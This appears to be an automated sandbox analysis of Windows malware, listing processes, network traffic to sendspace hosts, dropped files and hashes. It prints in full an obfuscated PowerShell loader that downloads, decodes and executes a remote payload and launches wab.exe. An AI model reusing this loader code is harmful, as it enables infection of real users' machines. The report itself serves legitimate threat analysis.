Lo,ebfla.taSlew.lOvert: HarpR SignnundemnD,rrseTopmib underOutletSvredrPos i= Mari( Cho T ,eenePa,losSyvkat,unai- StrmP KlovaStatutTopsehPopu, Idelf$ DdelSRepulpRegrar F.gai Uds.g kohohBl,nkt For.)Hexas ') ;Delhed (Afvarslingerne 'cry t$ Favoglsninl SkiloHamelbSapiea Bo.slR,ubo:,eoliRDrabbeUdsorm AfbreMyth m B.vibTe,areHollor Cheee Le,id vade=Somal$Wh,tegScabblLowesoGalopb Ap.iaSimillOverb: Lim.b PuggaPrewelPhot,l RadiiScintsAvo ctSouleo R guc ProcaDeni rCathod K.eoiRe acobr zegL dporAbortaAggl pEvilsh SeisyFixat+ D,nk+.arqu%Parab$,ndviUOblignHoflemgenn,oUn.ren KontoThreapSogneoEufeml Remai FritzAlpeniP kkenPentagBuler.BambucEnz,moTeanauPrecin patitPh,en ') ;$Generaene=$Unmonopolizing[$Remembered];}$Surmounting=305594;$Spejle=29502;Delhed (Afvarslingerne 'Unlea$GangagEle.tl .edbo RecobBelleaImperlMolti:Em.naC Downr,lagsaF,ikkn Wibei PrimobestagSig.ar BlisasuprapAn,toh Ugebeb,snirPolyg2Terra3 E sk8 haak Fersk=p,ess BadehGCho ieGaloctStift-PauseCUnsamo .nocnMim.stGenfreHateanStikntUnder Tran.$FormaSFor,dpAvissrTr,nsi ,ndegDamiah,ejectTulip ');Delhed (Afvarslingerne 'Super$ CelagravnelCrimeoRivalb Top aNonnolSkalp:MufflEHelulkTrinbsConflp Inv,lA hidoMilied PaukeR,mswrOlietiEnspen EntagCoalasFalla Third=Lat r Lui.[,nmanSArraiy ManisIsl,dtFreemeHovedmConsi.priorC Flabo Fr nnoversv Hd.reVrtsdrSponstGunsl] c.rt:Pagan: Ch tFInlanrme,teokvi kmPresaBAtomia TredsUnfelef,rhe6 Seps4tegniSOut.etGua.frSwa iiphot.nBesgegBegyn(Impor$LinieCRhodor Am ha.estsnStatii MetaoDapplgSupprrCrickaSp ldpIndsmhS,mpleA.tssrSinap2U res3Miner8Dumet)Octup ');Delhed (Afvarslingerne 'Skins$ antigIncurl.owmoo AndebSomatakantelAchil:Phot.S BranuTerkebAshilgCodbaiBarrea Klarn NonptPr pr Conju= nett Env,l[Figu,S,vermySmrsysUndert AmeleAbbedmWindf. R.ndTstraneStalaxSll.rtSimie. elleEFi ennCler c,inisoDyrebdBrnefi,verpnEd,ikgT lsk]Spica:Blas,: spekARereaS Fy iCLini,IGenopI Unr,. B.ldGSoc aeHjordtReproSUdso,tFeudar krmsiTea,snUdgy gNettl(Disp $Ban.oEBearbkoestrs CanoppeliklS.reao elledljer,ean ifrzooksi Huskn Ko tg Emots Vind)Forb, ');Delhed (Afvarslingerne 'Sk.iv$Middagcompul Sindokus.mbVeineaNedg lGer.n:FordyMDyn.loSanktrCoppeeUrinedPriva1Techn6Aflbs2Mot.r=Revol$HunyaSApprouJannebKlagegVenteiRel eaPlanlnNoncatSulte.Po.tis ekstuSisyfb Blegse,tert Yng rUnderiHelbrnRe,segamme.(Etfag$ .pasSSti,lu B.lkr Amstm poloo,ungeuValidnDansktWeldsiOpdatnNon,egIndta,Ther.$ManliS.rosspkavale DiakjBlufflOffeneTilse) a.st ');Delhed $Mored162;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bridgewards.Hal && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Elektroencefalograms = 1;$Unvacuously='Sub';$Unvacuously+='strin';$Unvacuously+='g';Function Afvarslingerne($corrodentia){$Skrivepapiret=$corrodentia.Length-$Elektroencefalograms;For($Parliaments178=5;$Parliaments178 -lt $Skrivepapiret;$Parliaments178+=6){$Mellemvejs+=$corrodentia.$Unvacuously.Invoke( $Parliaments178, $Elektroencefalograms);}$Mellemvejs;}function Delhed($Jambos){. ($Syresaltet254) ($Jambos);}$Fertilizing=Afvarslingerne 'KodifM BundoGangszAffeciM.gnel KvinlBeboeaI ter/Cata 5M,del.Uddat0.orur Wi.d(TilbaW,eganiDa sonDeprid Bag,o,aubewThermsTildm EkspaN AldeT Mim. pejls1Kopi.0Mmesl. Dia.0 ubb;Sl,mb Fami.WSprogiKurvenV,sos6Rema 4Entsv; onse Tarahx Bo.u6Kaval4 A,ls; tomk Cig.rr appev Satd:Anthr1Udmal2.ipho1Mis,a. Sed.0Sedat),uder Prov.Gdemile StercKopibkOversoU ykk/ F gh2Gutta0 Samm1Fl nc0Grund0skovs1nikke0Srpr,1Rubri Hov.dFParahiRimelr CamoedottofUlceroStrudxKreop/N.rco1Okap,2Klyng1Refrn.U,elv0Amula ';$Deniably=Afvarslingerne 'S.zinUPraissKittee,azumrUnder-WittyASadd,gNick eHyposnF,nget C nd ';$Generaene=Afvarslingerne 'Ra,cehmanubtConvatRainwpStddmsHenre:Garro/kn.ge/kerbew HabiwAcylawV.rso.Colons HumbeRebelnKonsodMungcsTranspSten,aBoaercChomse R in.CreencDi,tooB.ctemmili./ IntrpAdaylrpot.co Dip,/ enlsdVandclCopyi/OvertuHyn.eqBruti2phasc1EndostEmbry8Dokst ';$Barks=Afvarslingerne ' Lini>Kalku ';$Syresaltet254=Afvarslingerne 'SkoldiNeshleN.umexKla p ';$Stereomusik='Goldede';$Tohaandsbetjening = Afvarslingerne 'Klu peRv.dicrejsehMultio Pr,e samme% Ennoa ennepFr.udpPlanedHor eaMooratWhinnaZyzzy%Bge,g\Val dBt.ftsrRegi,iGrkerdRevolgUds.uePaschwArcosaCh orrInstrd Rej s Opin.SpotlHunbrua SegmlWarmu Sylle&Klosr&Trinu Fng.eHalfscBaterhCentro nfre BunsetKono, ';Delhed (Afvarslingerne 'An ui$ Sjl.gTil.vlC.oiroGelo,b linda IsaclTeleu:RetsvMPrvkebKnyeneBededlPulv,fOttomaSan,ob Halsrkasini ,ermkledsaaLe.bonPredetdaa.y=Ottin(regracRaggemTragadSni,f Dioe/P onec uth Kono$IndehTAfsvaoPterihDechiaVantaaCopian,malgd A stsBaut,bSh,rteBooketrgre,jAfdeleraspenaktiviMetabnLizarg cal )Sagog ');Delhed (Afvarslingerne 'T,ang$IsvafgOptimlForlao eetsb.uperaMellelIntro:Gal eU ReobnS.edemNavleoUnconn,aabeo,kadepMask ophilalitlliiAd erzNonnei Maninunmo,g Quil=afske$S vsnGShutte Pretn ileeUn apr Cumaa SpageI,ettnKandieKan,i.heptasMisrepVe,trl DagtiOxalatPho o( Road$ SaltBZoodeaTeutorSatsek TabusUnhos) Nond ');$Generaene=$Unmonopolizing[0];$Lommen= (Afvarslingerne ' arti$ Pre.g Lystl Sp,doDime,b SpilaGlatblcys,o:FamilGBaksglkate uSuantmMisreeHomotlI,proiVandlk HenpeTapet=To efNWinkeeSpearwStolt-DyresO stenbGadedjSogneeCamemcMounttDek t RibstSMineryUn.ros Showtbassee VirgmFili,. NonpNIndp eE,strt Impe.slap.WH.ldeeTreckbSti,lCly kelNykalinona,eRosennBangst');$Lommen+=$Mbelfabrikant[1];Delhed ($Lommen);Delhed (Afvarslingerne ',verc$A,rhuG,affllalpinuHannem ind,eskattlJustii DatakB,rfoeCorus.Stin.HHage eCassiaJointd nitheklunsr UnmesSkand[ Over$Ar.ehDSkr.de Job nAb.maizeoliaUn,ttbPsalmlPartiyA.phi] ronh=Infra$ GummF ou.se Discrsmuttt PretiCyst lPlur i I,cozRoamsiByzonnMul.igHexah ');$Frugtknudernes=Afvarslingerne 'Torum$SemiwGaxomelT ntauCradlmSikk eCairflLjertiUd.ikk,ncalecupma.JuvelDseptioAtomiwExhilnDkstolalbeioFl nraRgeredLi edF MechiAsh.nlCracceCupri(Kunst$suitcGgestaeSurlin subdeDato r alloa DereeNerv,nD sore Tyve, R dd$LobinSPyritpProterScru.iSubmigNederhReduntBn eb) Mart ';$Spright=$Mbelfabrikant[0];Delhed (Afvarslingerne ' Krs,$ProkugmouselIngenoCapesbCharaa burrl Cons:ForldRKundenNazitnWhimseAwakabLavi.rde.latAnielr Recc=s,ces( MonoTKr ste Spios SjuntVivis- VestP Syn aKaraktWe nahAtomb Fortr$ emnoSV.lkypRefr.r S,ppiOvertg On,uhHissettran.)Te.ze ');while (!$Rnnebrtr) {Delhed (Afvarslingerne 'Eurus$Hose gDiaselNot coSuperbSnydeaSeawalStraa: FolkB FernoGha,egOpgrea,ilnan pu.jm Crueetran l Ran.dSuperelignirHemateLobeo=Fods $FremftPa,asrmelituNeuroeTipni ') ;Delhed $Frugtknudernes;Delhed (Afvarslingerne 'NonloSOptatt PhilaTwin rSvaletDin.e-UnlanS NonslCit,eeKontoeJou.tpRo nd Trter4Dagsa ');Delhed (Afvarslingerne 'Dyrer$.antogFlop.l Che,o Lo,ebfla.taSlew.lOvert: HarpR SignnundemnD,rrseTopmib underOutletSvredrPos i= Mari( Cho T ,eenePa,losSyvkat,unai- StrmP KlovaStatutTopsehPopu, Idelf$ DdelSRepulpRegrar F.gai Uds.g kohohBl,nkt For.)Hexas ') ;Delhed (Afvarslingerne 'cry t$ Favoglsninl SkiloHamelbSapiea Bo.slR,ubo:,eoliRDrabbeUdsorm AfbreMyth m B.vibTe,areHollor Cheee Le,id vade=Somal$Wh,tegScabblLowesoGalopb Ap.iaSimillOverb: Lim.b PuggaPrewelPhot,l RadiiScintsAvo ctSouleo R guc ProcaDeni rCathod K.eoiRe acobr zegL dporAbortaAggl pEvilsh SeisyFixat+ D,nk+.arqu%Parab$,ndviUOblignHoflemgenn,oUn.ren KontoThreapSogneoEufeml Remai FritzAlpeniP kkenPentagBuler.BambucEnz,moTeanauPrecin patitPh,en ') ;$Generaene=$Unmonopolizing[$Remembered];}$Surmounting=305594;$Spejle=29502;Delhed (Afvarslingerne 'Unlea$GangagEle.tl .edbo RecobBelleaImperlMolti:Em.naC Downr,lagsaF,ikkn Wibei PrimobestagSig.ar BlisasuprapAn,toh Ugebeb,snirPolyg2Terra3 E sk8 haak Fersk=p,ess BadehGCho ieGaloctStift-PauseCUnsamo .nocnMim.stGenfreHateanStikntUnder Tran.$FormaSFor,dpAvissrTr,nsi ,ndegDamiah,ejectTulip ');Delhed (Afvarslingerne 'Super$ CelagravnelCrimeoRivalb Top aNonnolSkalp:MufflEHelulkTrinbsConflp Inv,lA hidoMilied PaukeR,mswrOlietiEnspen EntagCoalasFalla Third=Lat r Lui.[,nmanSArraiy ManisIsl,dtFreemeHovedmConsi.priorC Flabo Fr nnoversv Hd.reVrtsdrSponstGunsl] c.rt:Pagan: Ch tFInlanrme,teokvi kmPresaBAtomia TredsUnfelef,rhe6 Seps4tegniSOut.etGua.frSwa iiphot.nBesgegBegyn(Impor$LinieCRhodor Am ha.estsnStatii MetaoDapplgSupprrCrickaSp ldpIndsmhS,mpleA.tssrSinap2U res3Miner8Dumet)Octup ');Delhed (Afvarslingerne 'Skins$ antigIncurl.owmoo AndebSomatakantelAchil:Phot.S BranuTerkebAshilgCodbaiBarrea Klarn NonptPr pr Conju= nett Env,l[Figu,S,vermySmrsysUndert AmeleAbbedmWindf. R.ndTstraneStalaxSll.rtSimie. elleEFi ennCler c,inisoDyrebdBrnefi,verpnEd,ikgT lsk]Spica:Blas,: spekARereaS Fy iCLini,IGenopI Unr,. B.ldGSoc aeHjordtReproSUdso,tFeudar krmsiTea,snUdgy gNettl(Disp $Ban.oEBearbkoestrs CanoppeliklS.reao elledljer,ean ifrzooksi Huskn Ko tg Emots Vind)Forb, ');Delhed (Afvarslingerne 'Sk.iv$Middagcompul Sindokus.mbVeineaNedg lGer.n:FordyMDyn.loSanktrCoppeeUrinedPriva1Techn6Aflbs2Mot.r=Revol$HunyaSApprouJannebKlagegVenteiRel eaPlanlnNoncatSulte.Po.tis ekstuSisyfb Blegse,tert Yng rUnderiHelbrnRe,segamme.(Etfag$ .pasSSti,lu B.lkr Amstm poloo,ungeuValidnDansktWeldsiOpdatnNon,egIndta,Ther.$ManliS.rosspkavale DiakjBlufflOffeneTilse) a.st ');Delhed $Mored162;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bridgewards.Hal && echo t"

C:\Program Files (x86)\windows mail\wab.exe

"C:\Program Files (x86)\windows mail\wab.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 www.sendspace.com udp
US 104.21.28.80:443 www.sendspace.com tcp
US 8.8.8.8:53 fs12n1.sendspace.com udp
CA 69.31.136.53:443 fs12n1.sendspace.com tcp
US 8.8.8.8:53 crt.sectigo.com udp
US 104.18.38.233:80 crt.sectigo.com tcp
US 8.8.8.8:53 80.28.21.104.in-addr.arpa udp
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 53.136.31.69.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 58.99.105.20.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 104.21.28.80:443 www.sendspace.com tcp
US 8.8.8.8:53 fs13n1.sendspace.com udp
CA 69.31.136.57:443 fs13n1.sendspace.com tcp
US 8.8.8.8:53 57.136.31.69.in-addr.arpa udp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 43.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp

Files

memory/4220-2-0x00007FF8B1453000-0x00007FF8B1455000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_omztlonu.5s3.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4220-12-0x00000294EF790000-0x00000294EF7B2000-memory.dmp

memory/4220-13-0x00007FF8B1450000-0x00007FF8B1F11000-memory.dmp

memory/4220-14-0x00007FF8B1450000-0x00007FF8B1F11000-memory.dmp

memory/524-23-0x0000000074B1E000-0x0000000074B1F000-memory.dmp

memory/524-24-0x0000000002230000-0x0000000002266000-memory.dmp

memory/524-25-0x0000000004DD0000-0x00000000053F8000-memory.dmp

memory/524-26-0x0000000074B10000-0x00000000752C0000-memory.dmp

memory/524-27-0x0000000074B10000-0x00000000752C0000-memory.dmp

memory/524-28-0x0000000004B80000-0x0000000004BA2000-memory.dmp

memory/524-30-0x00000000054F0000-0x0000000005556000-memory.dmp

memory/524-29-0x0000000004D20000-0x0000000004D86000-memory.dmp

memory/524-40-0x0000000005660000-0x00000000059B4000-memory.dmp

memory/524-41-0x0000000005B60000-0x0000000005B7E000-memory.dmp

memory/524-42-0x0000000005B90000-0x0000000005BDC000-memory.dmp

memory/524-43-0x00000000073A0000-0x0000000007A1A000-memory.dmp

memory/524-44-0x00000000060E0000-0x00000000060FA000-memory.dmp

memory/524-45-0x0000000006E00000-0x0000000006E96000-memory.dmp

memory/524-46-0x0000000006D90000-0x0000000006DB2000-memory.dmp

memory/524-47-0x0000000007FD0000-0x0000000008574000-memory.dmp

C:\Users\Admin\AppData\Roaming\Bridgewards.Hal

MD5 ea20645d0a478dbb7ed3feaae27b7600
SHA1 4887a243769c6b7784c3e80024cbf2f4bb24303d
SHA256 e16f839346511b0f52f399c81148daccbe0d3465e60cd6153b57bacc3a2395cb
SHA512 ecef1f8709862074d483c7a92c4829217c41403b98e05d4873e6ae4eb934ba30b5fc1a8f1aa44b61167bd47da34b356d0d96da73969af45c29beef10b254b95b

memory/524-49-0x0000000008580000-0x000000000C13F000-memory.dmp

memory/4220-51-0x00007FF8B1450000-0x00007FF8B1F11000-memory.dmp

memory/4220-50-0x00007FF8B1453000-0x00007FF8B1455000-memory.dmp

memory/524-54-0x0000000074B10000-0x00000000752C0000-memory.dmp

memory/524-53-0x0000000074B1E000-0x0000000074B1F000-memory.dmp

memory/524-55-0x0000000074B10000-0x00000000752C0000-memory.dmp

memory/1812-71-0x00000000012C0000-0x0000000002514000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\3582-490\wab.exe

MD5 72ad21d191b58842334d32a381ea7fa8
SHA1 f7375f09855a7bce9f7a152c75e84aac69caf828
SHA256 87abfab7bf5e213fc9e63c7fa39edfa6452eb5f7fdd668cd370d9cf4ea3ef729
SHA512 78662231c7ce0d03374b69dfd32614786dc5bf0c8ad2baadf2143f42bb03bd378632cc457dc414aa7e3d284674cc9151c39f90d71d9a5dd15dba689b2283386d

memory/4220-85-0x00007FF8B1450000-0x00007FF8B1F11000-memory.dmp

C:\PROGRA~2\Adobe\ACROBA~1\Reader\ACROTE~1.EXE

MD5 0a1704e48ff603332eaac935608d3cf1
SHA1 e138d3d481c054a89b85312bfddd2f8a0baf8c1b
SHA256 d9e02af7b220e25f385c71e0a3be4b83203e0673cc1e56fcf02d3e1f0f3774b6
SHA512 7cec7a7c5542e66e347381e9ab5572b2231ab11dac61d9a76bcb7cbd4bd1e86f8169e7840c2e69f93e686cc1834e52cd6b47817b760ea618139a3de64076314f

memory/1812-100-0x00000000012C0000-0x0000000002514000-memory.dmp

memory/1812-174-0x00000000012C0000-0x0000000002514000-memory.dmp

memory/1812-175-0x00000000012C0000-0x0000000002514000-memory.dmp

memory/1812-177-0x00000000012C0000-0x0000000002514000-memory.dmp